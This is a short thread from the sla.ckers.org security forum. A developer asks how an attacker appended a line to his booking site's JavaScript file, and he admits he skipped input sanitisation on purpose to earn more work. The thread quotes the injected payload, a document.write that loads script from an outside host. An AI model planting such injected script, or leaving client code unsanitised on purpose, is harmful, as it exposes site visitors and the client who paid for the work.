Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
injection alters javascript file
Posted by: darkstar
Date: June 02, 2014 12:22PM

OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/mySQL. The owner won't pay much so I don't sanitize user input etc and generally do a half arsed job hoping, maybe, that i'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included javascript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
did they get the ftp password? if so how? what other avenues did/could they use to alter this file?

The js file only provided form validation, cvhecking if boxes were filled in etc.

P.S I won't be so negelectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

Options: ReplyQuote
Re: injection alters javascript file
Posted by: darkstar
Date: June 13, 2014 03:03PM

I'm not getting any replies, have I asked a dumb question?

Options: ReplyQuote


Sorry, only registered users may post in this forum.